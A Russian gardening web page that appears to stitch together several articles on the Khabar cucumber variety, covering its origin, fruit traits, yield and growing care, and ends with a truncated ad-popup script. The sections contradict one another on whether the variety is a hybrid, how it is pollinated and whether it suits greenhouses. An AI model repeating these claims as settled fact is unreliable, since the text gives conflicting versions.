1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Характеристика сорта огурцов хабар

Сорт огурца Хабар

Выращивать теплолюбивые огурцы в регионах с, мягко говоря, прохладным климатом, например, на Дальнем востоке, — дело очень хлопотное. И не только потому, что в этих краях довольно холодно и световой день короткий. В неблагоприятных регионах нежную культуру чаще поражают свойственные этому семейству болезни. Именно поэтому дальневосточные селекционеры направили свои усилия на создание сортов, которые бы не только могли противостоять погодным условиям, но и справлялись бы с болезнями. В 1999-ом году ФГБНУ «Дальневосточный научно-исследовательский институт сельского хозяйства» зарегистрировал разновидность под названием Хабар. Автор — известная учёный-селекционер О.Н. Мигина. В 2000-ом году новинка была внесена в Госреестр селекционных достижений России с допуском по всем регионам. Скорее всего, своё имя растение получило по месту рождения — Хабаровский край. Но одной из трактовок такого, несколько жёстко звучащего слова, является «удача». Новая разновидность действительно оказалась удачной. После сортоиспытаний её рекомендовали для выращивания в открытом грунте на садово-огородных участках, приусадебных и мелких фермерских хозяйствах. Необычайной популярностью этот огурец пользуется у овощеводов Приамурья и Приморья. Ценится не только в России, но и в Молдове и Украине. Подходит для промышленного выращивания. Не является гибридом.

Описание

Растение индетерминантного типа, среднерослое, довольно плетистое, среднеоблиственное. Тип цветения смешанный. Листья среднего размера, слабоморщинистые, зелёного цвета. В каждом листовом узле Хабара формируется одна завязь.

Плоды у сорта удлинённо-яйцевидной формы, небольшие, длина 10,4 — 10,7 см, диаметр 3,9 — 4,1 см. Кожица эластичная, средней плотности. Окраска зелёного цвета, со светлыми полосами средней длины и маленькими округлыми пятнами. Поверхность покрыта крупными бугорками средней плотности, опушение чёрное. Мякоть сочная, довольно плотная, но нежная, аромат яркий, огуречный. Главная отличительная особенность — полное отсутствие горечи. Вкус сладкий, Госреестр оценил вкусовые качества свежих, солёных и консервированных огурцов как отличные. Овощеводы полностью поддержали эту оценку, причисляя разновидность к самым вкусным. Кстати, на конкурсе «Золотая осень-2011» наш герой завоевал золотую награду за вкусовые качества и урожайность. Масса готового к съёму зеленца 92 — 98 грамм, но не более 100 грамм.

Характеристики

  • Хабар относится к раннеспелым сортам, что в условиях регионов с коротким летом является ценным качеством. С момента всходов сеянцев до начала сбора проходит от 41 до 46 дней;
  • период плодоношения длительный, урожайность стабильная;
  • товарная урожайность 3,9 кг с 1 квадратного метра. С одного гектара можно снять до 40 тонн первоклассной продукции. Эти показатели вполне могут заинтересовать фермеров, выращивающих овощи на продажу;
  • выход товарной продукции высокий — 90%;
  • разновидность относится к пчёлоопыляемым, поэтому в закрытых теплицах выращивать её не стоит;
  • адаптивность к погодным условиям у огурца очень высокая. Растения прекрасно развиваются и плодоносят и в холодном климате, и в жарком;
  • иммунитет у Хабара прекрасный. Наш герой обладает устойчивостью к бактериозу и ложной мучнистой росе;
  • ещё одна ценная особенность сорта — способность быстрого восстановления листового аппарата, что позволяет получать урожай даже в неблагоприятные в плане грибковых инфекций годы;
  • транспортабельные возможности прекрасные, урожай выдержит длительные перевозки без утраты товарного вида. Лёжкость также хорошая;
  • способ употребления — универсальный. Отличный свежий вкус позволяет использовать овощ в натуральном виде, например, в салатах. Благодаря крупным бугоркам и плотной мякоти, огурцы обладают отличными засолочными качествами, прекрасно подходят и для консервирования.

Агротехника

Выращивать Хабар довольно легко — прямым посевом семян в грунт или с помощью рассады. Непосредственно в почву семена высевают, как только минует угроза заморозков, а грунт прогреется до 15 — 20 °C, причём ночные температуры не должны опускаться ниже 8 °C. На рассаду огурцы высевают в апреле — мае. Готовую 20 — 25-дневную рассаду высаживают в конце мая — начале июня. На 1 квадратный метр рекомендуется садить не более 4-х растений. Уход обычный для культуры в целом. Хорошие результаты дадут внекорневые подкормки мочевиной с небольшой добавкой марганцово-кислого калия и медного купороса.

Хабар — уникальный по своим характеристикам сорт, который идеально подходит для прохладных регионов. Устойчивый к болезням и адаптивный, он ещё отличается превосходными вкусовыми качествами и универсальным использованием урожая. Ещё один несомненный плюс — возможность собрать семена для дальнейшего выращивания самостоятельно.

Огурец Хабар: фото, отзывы и описание

Среди прочих сортов огурец Хабар является одним из самых почитаемых в среде огородников. Его ценят за неприхотливость в уходе, вкус плодов и массу других достоинств.

Характеристика огурцов Хабар

Огурец сорта Хабар селекции Дальневосточного НИИ сельского хозяйства в 2000 году внесен в Госреестр РФ для выращивания на всей территории России. Относится к высокорослым раннеспелым, растениям смешанного типа цветения. Для него характерно опыление пчелами и устойчивость к температурам не ниже +5 °C, а потому овощ отлично приспособлен выращиванию в открытом грунте.

По описанию огурцы Хабар немногим отличаются от других сортов и имеют форму удлиненного цилиндра и насыщенную зеленую окраску с полосами более светлого оттенка, как на фото. Их поверхность бугристая, а сами наросты зачастую напоминают колючки. В длину плоды могут достигать 9 — 11 см, в то время как диаметр их составляет от 3 до 4 см. Средний вес одного огурца равен 80 — 90 г.

Вкусовые качества огурцов

Огурец Хабар полюбился огородникам во многом благодаря своим вкусовым качествам, которые выгодно выделяют его на фоне других сортов. Мякоть овоща отличается плотностью, но, несмотря на это, остается нежной и сочной. Другими отличительными свойствами этого сорта огурцов являются насыщенный характерный аромат и полное отсутствие горького послевкусия. По этой причине огурцы сорта Хабар широко используются в кулинарном деле для изготовления салатов и закаток. Не менее вкусны овощи и в сыром виде.

Плюсы и минусы сорта огурцов Хабар

Исходя из описания свойств огурца сорта Хабар, можно сделать вывод о его положительных характеристиках. Овощ отличают:

  • прекрасные гастрономические свойства;
  • отсутствие горького послевкусия при употреблении;
  • быстрое созревание;
  • высокая урожайность;
  • долгий срок плодоношения;
  • хорошая переносимость транспортировок;
  • возможность длительного хранения;
  • болезнестойкость;
  • способность одинаково успешно произрастать в открытом грунте и в теплицах.

Однако огурец Хабар имеет и определенные недостатки. К ним можно отнести:

  • наличие на поверхности овоща колючек;
  • прихотливость относительно грунта, в котором произрастает огурцы этого сорта;
  • теплолюбивая природа растения.

И, хотя отрицательные свойства огурца Хабар в определенной степени сказываются на последующем уходе за этим сортом, достоинства этого овоща значительно превосходят имеющиеся недостатки.

Оптимальные условия выращивания

Перед тем как посадить огурец Хабар на своем участке, растениям этого сорта следует обеспечить оптимальные условия выращивания. Для этого необходимо заблаговременно подготовить посадочное место для овоща.

Поскольку огурец Хабар относится к теплолюбивому сорту, при выборе места для посадки следует отдавать предпочтение солнечным участкам. Лучше всего подойдет зона, где овощ не будет подвергаться воздействию прямых солнечных лучей – так риск получения огурцом солнечных ожогов станет минимальным. Кроме того, желательно выбрать место, которое было бы хорошо защищено от сквозняков.

Согласно отзывам, грунту для выращивания огурцов сорта Хабар также стоит уделить достаточное внимание. Поскольку овощ очень плохо растет в кислых почвах, перед посадкой стоит позаботиться о том, чтобы выровнять рН-показатели участка. Как правило, делают это заранее, в осеннее время, внося в грунт известку. В этот же период участок очищают от сорных растений и ненужных корней путем перекопки.

В апреле отведенное под посадку место вновь перекапывают, а после ровняют. На второй неделе мая в грунт вносят удобрения, например, минеральную подкормку или перегной.

Агротехника огурцов Хабар

Несмотря на довольно масштабные подготовительные работы, предшествующие посадке овоща, уход за огурцом сорта Хабар не слишком сложен. Как правило, он сводится к поливу, подкормке и периодической обработке от вредителей и различных заболеваний. Некоторые нюансы имеют различные способы посадки овоща, однако такая процедура будет под силу даже начинающим огородникам, если придерживаться ряда рекомендаций.

Посадка на рассаду

Если сравнивать этот овощ с другими сортами, посадку огурца Хабар на рассаду осуществляют достаточно поздно, в первые дни мая. Ростки появляются спустя 2 — 3 недели. Как только на них образуется не меньше 4 листков, растения пересаживают в теплицу.

Посадка в грунт

Другой вариант посадки овоща подразумевает непосредственное высевание семян огурца в открытый грунт. Так же, как и в случае с рассадой, процедура приходится на период с конца мая по начало июня. Мероприятие желательно проводить после того, как опасность внезапных заморозков полностью исчезнет, а температура грунта составит днем +15 — 20 °С. Семена помещают в подготовленный грунт на 1,5 — 2 см вглубь. При этом расстояние между грядками должно составлять не менее 50 см. Как только сеянцы взойдут, их нужно проредить таким образом, чтобы на 1 погонном метре осталось 4 — 5 растений.

Полив и подкормка

Своевременный полив и подкормка помогут не только добиться обильного урожая, но благотворно скажутся на вкусовых свойствах огурца Хабар.

Овощ требует регулярного и щедрого полива нехолодной отстоянной водой непосредственно под корень. Причем, количество поливов зависит от фазы роста растения. Так, в период активного роста и завязывания цветков огурец Хабар необходимо поливать 1 раз каждые 5 дней из расчета 3 — 4 л воды на 1 м 2 . Во время цветения и плодоношения полив проводят чаще – 1 раз в 3 дня используя до 10 л на 1 м 2 .

Подкормку огурцов сорта Хабар осуществляют не чаще 5 раз за сезон, чередуя минеральные удобрения с органическими.

Формирование

Поскольку огурец Хабар причисляют к пчелоопыляемым сортам, при формировании растения обычно используют вертикальную шпалеру, по которой ведут один основной стебель. Как только он достигает верха шпалеры, стебель прищипывают и удаляют все боковые побеги и цветки в пазухах первых 3 листков. Прищипывание прочих побегов осуществляют над 3-м листом.

Защита от болезней и вредителей

Хотя огурец Хабар можно причислить к сортам, которые обладают высокой устойчивостью к паразитам и болезням, недостаточный уход за растением может стать причиной возникновения различных недугов. Во избежание подобного стоит взять на заметку некоторые полезные советы:

  1. Огурцы сорта Хабар следует высаживать только в тщательно подготовленный грунт с необходимым количеством удобрений.
  2. Отдавать предпочтение лучше качественным семенам проверенных производителей, которые гарантированно прошли дезинфекцию.
  3. Необходимо своевременно избавляться от поврежденных частей растения, погибших или больных экземпляров.
  4. Время от времени нужно обрабатывать огурцы фунгицидами и средствами от насекомых в качестве профилактической меры.

Следование этим несложным правилам поможет обезопасить этот сорт огурцов от заболеваний и потенциальных вредителей.

Урожайность

Что касается урожайности сорта Хабар, то ее можно назвать весьма высокой. С 1 м 2 овощных грядок можно получить до 3 — 4 кг огурцов. Это позволяет выращивать огурцы этого сорта не только для личного пользования, но и в промышленных масштабах. Большим преимуществом при таких впечатляющих показателях урожайности является длительный срок хранения огурцов. Они долгое время не теряют товарного вида и вкусовых свойств, в том числе, при транспортировках на дальние расстояния.

Заключение

Огурец Хабар по праву заслуживает внимания огородников благодаря своим гастрономическим свойствам и непритязательности. Если проявить к этому сорту должную заботу, тогда усилия, вложенные в уход за ним, будут с лихвой вознаграждены обильным и вкусным урожаем.

Описание огурцов Хабар

В последние годы появилось много новых огуречных сортов с улучшенными качествами. Одним из наиболее нетребовательных к климатическим условиям выступает огурец Хабар — обладает яркими вкусовыми свойствами и неприхотлив в уходе.

Описание огурцов Хабар

Характеристика сорта

Сорт огурцов Хабар выведен знаменитым селекционером, Ольгой Мигиной. Зарегистрирован в 1999 году ФГБНУ «Дальневосточный научно-исследовательский институт сельского хозяйства».

С 2000 года внесен в Госреестр селекционных достижений России и рекомендован к выращиванию в различных регионах.

Достоинства и недостатки

По характеристике, огурцы сорта Хабар считаются одними из самых сильных и стойких разновидностей.

Культура обладает рядом преимуществ:

  • превосходные вкусовые свойства, нет привкуса горечи;
  • продолжительный период плодоношения и стабильно высокая урожайность даже при неблагоприятных погодных условиях;
  • раннеспелость – от появления всходов до первого урожая проходит 40 — 45 дней;
  • устойчивость к заболеваниям, в частности, к бактериозу и ложной мучнистой росе;
  • при поражении грибковыми инфекциями способен быстро восстанавливать листовой аппарат;
  • отличные показатели хранения и транспортабельности;
  • относится к пчелоопыляемым, но может самоопыляться;
  • одинаково хорошо выращивается в открытом грунте и в теплицах;
  • универсальность применения — огурцы можно употреблять в свежем виде, а также использовать для консервации.

Имеются некоторые отрицательные качества:

  • наличие шипов;
  • требовательность к составу грунта;
  • теплолюбивость.

Описание плодов и кустов

Сорт Хабар — гибрид типа f1, выведен в результате ступенчатого скрещивания японского сорта Токива Жибаи с Дальневосточным 27 и с селекционным образцом 0,1723.

Индетерминантный куст, со средней ветвистостью, смешанного типа цветения. Листья зеленые, среднего размера, морщинистые.

Корнишонный огурец, удлиненно-цилиндрической формы, длиной 9 — 10 см, диаметр примерно 4 см. Кожура тонкая, с крупными бугорками, темно-зеленым опушением. При употреблении в сыром виде не ощущается наличие семян. Средний вес плода 90 — 100 г. Выход товарной продукции составляет 90 %.

Особенности выращивания

Сорт Хабар выращивать несложно, если соблюдать определенные правила. Под грядку с огурцами нужно подготовить участок с осени.

Культура не любит кислую почву,поэтому надо провести известкование. В зависимости от степени кислотности и структуры почвы вносят от 600 г (кислые глинистые) до 100 г (слабокислые песчаные) на 1 м. Для этого по поверхности грунта рассыпают химическое вещество, перекапывая на глубину 20 см.

Весной разравнивают почву и вносят минеральные удобрения – перегной или древесную золу. Для этого 1 л куриного или 2,5 л коровьего помета разводят в 15 л воды.

Отличный урожай при правильной высадке

Выращивание рассады

Посев семян на рассаду проводят в начале мая. При необходимости, их необходимо обеззаразить в растворе марганцовки. Использовать для посадки купленный грунт или торфяные таблетки. Температура почвы должна быть 16 ºС.

Семена сажают на глубину не более 2 см. Грунт полить и накрыть пленкой до появления всходов.

Высадка в открытый грунт осуществляется в фазе четырех листков в третьей декаде мая — первой декаде июня.

Пересадка рассады

Для высадки рассады на заранее подготовленном участке сделать лунки с междурядьями 50 см, а расстояние между растениями 25 — 30 см.

Рассаду огурцов надо очень аккуратно вынуть из ящиков, углубить в подготовленные, увлажненные лунки и утрамбовать землю руками.

По описанию, дальнейший уход за сортом Хабар заключается в поливе огурцов, прополке, подкормках и профилактике борьбы с вредителями.

  1. Полив регулярный, 1 раз в пять дней теплой, отстоявшейся водой. Под каждый куст льют 1 л воды. После начала плодоношения поливать надо каждые 3 дня по 2,5 — 3 л воды под растение.
  2. Подкормка минеральными и органическими удобрениями чередуется. Всего нужно провести не больше 5 подкормок. Вносить их надо во влажную почву, прямо под корень. Через пару недель после пересадки на постоянное место проводят удобрением раствора минеральных веществ (2 ст л суперфосфата на 10 л воды смешать с 1 ст золы) или комплексными удобрениями: Мастер, Агрикола (описание применения в инструкции к препарату). Спустя неделю повторить. В пасмурную погоду проводят внекорневое опрыскивание (15 г мочевины на 10 л воды).
  3. Для увеличения насекомых-опылителей опрыскивают сиропом (на 1 л воды 2 г борной кислоты и 100 г сахара).
  4. Прополку проводить осторожно, т.к. корневая система находится в верхнем слое грунта и ее легко повредить. Одновременно с рыхлением желательно окучить кусты.
  5. Для стимуляции роста боковых побегов необходимо провести прищипывание над 5 — 6 листком. Формирование куста происходит поэтапно. Сначала удаляются все завязи, чтобы укрепилась корневая система. Затем на побеге в промежутке от 4 до 8 листка оставить одну завязь, а следующую завязь прищепить, процедуру повторить еще раз от 8 до 12 листка. Куст приобретет форму перевернутой елки.
  6. В целях профилактики заражения насекомыми вредителями растения опрыскивают настоем чеснока, для приготовления которого 100 г измельченных зубчиков настаивать неделю в 1 л воды и потом развести в 9 л жидкости. При появлении тли следует опрыскать раствором Актеллика или Фитоверма (описание применения препарата на упаковке).
  7. Завершающий этап ухода за огурцами заключается в ежедневном сборе урожая.

Советы

При обнаружении изменений внешнего вида или размера плода надо определить, что мешает развиваться правильно:

  • форма лампочки с сужением у плодоножки, говорит о нехватке калия (подливать раствор золы по 1 л под корень);
  • крючкообразным огурцам не хватает фосфата калия, проведите опрыскивание раствором (1 ч л на 1 л воды);
  • тонкий кончик и толстое брюшко указывает на недостаток азота, подлейте органики;
  • горчат от недостатка влаги и перепада температур, поможет избавиться полив теплой водой;
  • белесые и мелкие плети – опрыскивание мочевиной (15 г на 10 л воды).

Огурец Хабар: отзывы, фото, урожайность

Многие садоводы мечтают выбрать для своего огорода идеальный сорт огурцов. В большинстве случаев, помимо вкусовых качеств огурцов, необходимо знать, какой грунт лучше использовать, процесс созревания плодов, их универсальность. Порой может показаться, что не существует такого сорта, который будет максимально приближен к идеальному. Огурец Хабар – сорт, где собраны все преимущества, которые только присутствуют в огуречных видах.

Описание сорта огурцов Хабар

Сорт огурцов Хабар является раннеспелым, имеет универсальное предназначение. По виду является индетерминантным, тип цветения смешанный, о чем заявляет производитель. Как и любые другие огуречные сорта, Хабар стоит подвязывать. В процессе плодоношения появляются зеленые плоды длиной до 11 см и диаметром до 4 см. Отличительной особенностью является отсутствие горечи и отличные вкусовые качества. Ниже представлено фото огурцов Хабар.

Подробное описание плодов

Спелые огурцы сорта Хабар имеют удлиненную, слегка яйцевидную форму. Длина варьируется от 10,5 до 11 см, диаметр составляет порядка 4 см. Кожура довольно эластичная, плотность среднего уровня. Огурцы зеленого цвета, имеются светлые полосы средней длины и небольшие круглые пятна. На поверхности можно увидеть крупные бугорки. Масса плода варьируется в пределах 90-100 г, но не больше.

Мякоть довольно сочная и в тоже время плотная, нежная. Огуречный аромат ярко выражен. Отличительной особенностью сорта является отсутствие горечи. Согласно данным из Государственного реестра, вкусовые качества готовой продукции были оценены на «отлично». Овощеводы также придерживаются данной оценки и считают огурцы Хабар самыми вкусными.

Характеристика огурцов Хабар

При рассмотрении характеристик сорта огурцов Хабар стоит обратить особое внимание на следующие моменты:

  • Огурцы Хабар относятся к раннеспелым сортам, что является большим плюсом при выращивании культуры в регионах с непродолжительным летом. С момента, когда взошла рассада, должно пройти около 45-50 дней, после чего можно приступать к сбору урожая.
  • Длительный период плодоношения.
  • Стабильный уровень урожайности каждый год.
  • С каждого кв. м можно собирать до 4 кг огурцов. Благодаря таким высоким показателям огурцы сорта Хабар полюбились многим фермерам, выращивающим культуру для реализации в крупных масштабах.
  • Более 90% огурцов имеют отличные вкусовые качества и товарный вид.
  • Так как данный сорт должен опыляться пчелами, то высаживать его в теплицах не рекомендуется.
  • Высокий уровень адаптации к городским условиям.
  • Высокий уровень плодоношения, как в холодных, так и в жарких регионах страны.
  • Особенностью является повышенная устойчивость к появлению вредителей и ряду заболеваний.
  • Листовой аппарат восстанавливается довольно быстро, в результате чего можно получить урожай даже в самых неблагоприятных условиях.
  • При необходимости можно перевозить на длинные расстояния без потери товарного вида.

Благодаря универсальности, плоды можно употреблять в свежем виде и использовать для консервирования.

Урожайность

Огурцы сорта Хабар отличаются высоким уровнем урожайности. После того как они были высажены в открытый грунт (рассадным способом), готовый урожай можно собирать спустя 45-50 дней. Для того чтобы получить высокий уровень урожайности, необходимо обеспечить качественный уход за посадочным материалом. Таким образом, необходимо регулярно поливать культуру, в процессе роста вносить минеральные и органические удобрения. Кроме этого, необходимо проводить профилактические мероприятия против появления вредителей и заболеваний.

Устойчивость к вредителям и заболеваниям

Как уже говорилось, огурцы сорта Хабар отличаются высоким уровнем устойчивости ко многим видам заболеваний и к появлению вредителей. Несмотря на это, рекомендуется учитывать следующие рекомендации, благодаря которым риск появления вредителей будет сведен к минимуму:

  • не рекомендуется высаживать в открытый грунт семена низкого качества и материал, который не прошел предварительную дезинфекцию;
  • высаживать рассаду либо семена можно только в качественную почву, в которую внесены удобрения;
  • своевременно удалять поврежденные и больные растения;
  • удалять поврежденные части кустов.

В случае если на огурцах появились вредители, то стоит использовать опрыскиватель и специальные химические препараты.

Плюсы и минусы сорта

Согласно описанию и фото, огурец сорта Хабар имеет ряд преимуществ, которые позволяют выделять данную культуру среди других сортов:

  • полностью отсутствует горечь;
  • высокий уровень урожайности;
  • стабильное ежегодное плодоношение;
  • главным преимуществом является хорошая сохранность урожая, в результате чего огурцы можно перевозить на длинные расстояния;
  • непродолжительный срок созревания, занимающий 45-50 дней;
  • высокий уровень устойчивости к вредителям и заболеваниям.

Среди недостатков, характерных данному сорту, можно выделить:

  • наличие шипов на поверхности плода;
  • высокая требовательность к качеству грунта.

Перед тем как приобрести огурцы сорта Хабар, важно понимать, что высокая урожайность будет получена только при должном и качественном уходе.

Правила выращивания

В процессе выращивания огурцов Хабар стоит придерживаться следующих рекомендаций:

  1. На протяжении сезона допускается вносить удобрения и подкормки не более 5 раз.
  2. В случае если используется органика и минеральные удобрения, вносить их рекомендуется по очереди, каждый раз меняя типы.
  3. Полив должен быть регулярным. До наступления цветения поливают 1 раз каждые 5 дней. На 1 кв. м должно уходить от 4 л воды. В момент цветения и обильного плодоношения почву орошают 1 раз в 3 дня, используя до 10 л воды на каждый 1 кв. м.

В случае если данные рекомендации будут нарушены, то урожайность значительно уменьшится, кроме этого, есть вероятность появления заболеваний.

Сроки посева

Судя по отзывам, сорт огурцов Хабар не так сложно выращивать, как может показаться многим неопытным огородникам. В открытый грунт можно высаживать рассаду либо сразу сеять семена. Если выбран второй способ, то работы рекомендуется проводить после того, как угроза заморозков полностью миновала, а температурный режим грунта варьируется в пределах от + 15 °С до + 20 °С. При этом в ночное время температура не должна опускаться ниже + 8 °С.

Если выбран рассадный способ, то посадочный материал начинают выращивать в конце апреля либо в начале мая. После того как огурцам исполнилось 20-25 дней, можно переносить их на постоянное место произрастания – в открытый грунт.

Выбор места и подготовка грядок

Перед тем как приступить к высадке посадочного материала в открытый грунт, необходимо предварительно выбрать и подготовить место. Так как огурцы сорта Хабар являются теплолюбивыми, на выбранный участок земли должны попадать прямые солнечные лучи. Кроме этого, участок должен быть обязательно защищен от сильных ветров.

Подготовкой земли начинают заниматься с осени. Для этого земельный участок необходимо внимательно осмотреть, удалить весь мусор, перекопать землю и убрать сорную траву. Важно учитывать, что огурцы Хабар не растут на кислых почвах, в результате чего рекомендуется добавить известь. Весной, во второй половине апреля, участок повторно перекапывают, выравнивают, удаляют сорняки. Только после этого можно делать грядки и высаживать огурцы.

Как правильно сажать

Рассаду высаживают в открытый грунт на 20-25 день, когда появилось 4 листа. На заранее подготовленной почве делают бороздки либо лунки и погружают посадочный материал на глубину от 1,5 см до 2 см. Между соседними бороздками необходимо оставлять расстояние, равное 0,5 м. После того, как было осуществлено прореживание, на каждом погонном м должно оставаться не больше 4 растений.

Последующий уход за огурцами

В процессе роста культуре необходимо обеспечить качественный уход, только в таком случае можно рассчитывать на хороший урожай. На протяжении сезона рекомендуется вносить подкормку порядка 5 раз, при этом разные удобрения стоит чередовать.

До наступления цветения поливать культуру рекомендуется каждые 5 дней, в момент цветения и плодоношения полив увеличивают и осуществляют каждые 3 дня. После орошения стоит удалить сорную траву.

Заключение

Огурец Хабар – сорт, который действительно заслуживает особого внимания. Обусловлено это большим количеством преимуществ. Особенностью является высокий уровень устойчивости ко многим видам заболеваний и вредителям. Кроме этого, плоды являются универсальными, в результате чего их можно употреблять в пищу в свежем виде либо использовать для консервирования.

Отзывы об огурцах Хабар

Огурец Хабар

Этот сорт имеет не только отличный вкус. Огурец Хабар можно есть свежим, солить или консервировать. При этом его выращивание не слишком трудоёмкое и сложное. Это прекрасный выбор для дач, приусадебных участков и небольших фермерских хозяйств.

Общая информация

Этот сорт включён в Государственный реестр РФ с рекомендацией для выращивания на дачных участках, в небольших фермерских хозяйствах.

Сорт является результатом технологической разработки. Для того, чтобы его вывести, проводилось ступенчатое скрещивание одного из японских сортов под названием Токива Жибаи с Дальневосточным 27 и с селекционным образцом 0,1723.

Этот сорт является гибридом типа Ф1, который является продуктом скрещивания двух или нескольких сортов, наследуя их лучшие характеристики. Наряду с этим сорт получает энергию и жизнестойкость.

Описание сорта огурца Хабар

Плоды представляют собой огурцы корнишонного типа. Длина одного экземпляра в среднем равна 9,5 см. Вес его составляет обычно примерно 80 г. Форма плода — удлинённо-цилиндрическая. Кожица крупно-бугорчатая, с тёмным опушением. Диаметр огурцов, как правило, не превосходит 4 сантиметров.

Одной из отличительных особенностей сорта является длительный период плодоношения. Сбор первого урожая происходит уже через 43 — 46 суток после посева.

Обратите внимание! У сорта сформировалась высокая устойчивость к вредителям и болезням.

Огурец имеет отличный вкус, в котором не чувствуется горечи. У него тонкая кожура. При поедании он хрустит, семена при этом не ощущаются.

Сорт относится к раннеспелым. Опыление происходит с помощью пчёл.

Куст относительно высокий. Характер его ветвистости средний.

Использование сорта Хабар можно охарактеризовать как универсальное:

  • его можно есть;
  • он имеет прекрасный вкус, если его засолить;
  • хорошо подходит для консервации.

На квадратный метр урожайность в течение года достигает 4 килограммов.

Как правильно выращивать

Подготовку к высадке нужно начинать ещё осенью. При этом нужно внимательно осмотреть участок и избавиться от мусора и от сорняков. После этого перекопать землю.

Сорт не любит кислую почву, если на участке именно такая, рекомендуется провести известкование.
Весной, в апреле, необходимо ещё раз перекопать этот участок. После этого землю разравнивают.

Посадка семян

При посадке нужно внимательно относиться к подбору сортовых семян.

Обратите внимание! Семена перед проращиванием нужно обработать марганцовкой.

Также нужно избегать использовать низкокачественный сортовой материал.

При посадке семена не рекомендуется заглублять более, чем на 2 см. Сеять их можно в ящики или торфяные таблетки. Грунт хорошо увлажнить и прикрыть пленкой, пока не появятся всходы.

Посадка в грунт возможна после того, как у рассады каждый росток сформирует не меньше 4 листиков. Это происходит в конце мая или начале июня.

Высадка рассады в грунт

Хотя растение способно уверенно переносить небольшие холода, считается, что при посадке лучше не рисковать. Если ожидается, что летом будут резкие перемены погоды, рекомендуется выращивать огурцы в парниках.

Между грядками нужно оставить промежуток не менее 50 см. Когда всходы окрепнут, их нужно проредить, оставив самые здоровые. При этом на одном метре грядки остаётся не более четырёх растений.

При уходе за кустом нужно учитывать несколько важных правил:

  • Количество подкормок куста не должно быть больше 5.
  • Использовать органические и минеральные удобрения необходимо поочерёдно, меняя их типы.
  • Нужен регулярный полив. До цветения достаточно поливать не более 1 раза на в 5 дней. При этом на один квадратный метр достаточно не более 4 литров воды. Как только настанет пора плодоношения и цветения, режим полива меняется. Его теперь рекомендуется проводить раз в 3 дня. На один квадратный метр нужно расходовать не больше 10 литров. Если правила нарушить, это может привести не только к снижению урожайности сорта, но и к заболеванию огурцов.

Воду для полива нужно использовать тёплую и отстоявшуюся. Лить нужно прямо под корень, не мешая формированию кустов.

Во время выращивания необходимо принять меры для защиты огурцов от болезней и вредителей.

При посадке нужно принимать во внимание качество грунта. Выращивать огурец Хабар можно только на плодородной почве.

Важно! Если на листьях или стеблях появились признаки заболевания — пятна, налет, изменение цвета — их надо убрать с грядки и уничтожить.

Ели на грядках появляются вредители, необходимо своевременно проводить соответствующее опрыскивание.

Важно! В период созревания урожая собирать огурцы необходимо каждый день. Нужно помнить, что перезревшие огурцы теряют свои потребительские качества.

Достоинства и недостатки сорта

Огурец Хабар обладает рядом особенностей, которые выделяют этот сорт среди других.

Вот его достоинства:

  • Вкус огурца лишен горечи.
  • У этой разновидности отличная урожайность.
  • Хорошая сохранность — ещё одно важное достоинство сорта Хабар. Его можно достаточно долго хранить без потери качества.
  • Его отличает относительно небольшой срок созревания.
  • Относится к самоопыляемым культурам.
  • Имеет хорошую устойчивость к негативным воздействиям внешней среды.
  • Существует возможность выращивания сорта как в открытом грунте, так и в парниках.

Также можно отметить недостатки, присущие огурцам этого сорта:

  • На поверхности огурцов присутствуют шипы.
  • Растение требовательно к качеству почвы.
  • Огурец Хабар относится к категории теплолюбивых сортов.

Обеспечив условия для выращивания сорта Хабар, можно получить большой урожай огурцов, имеющих прекрасный вкус.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
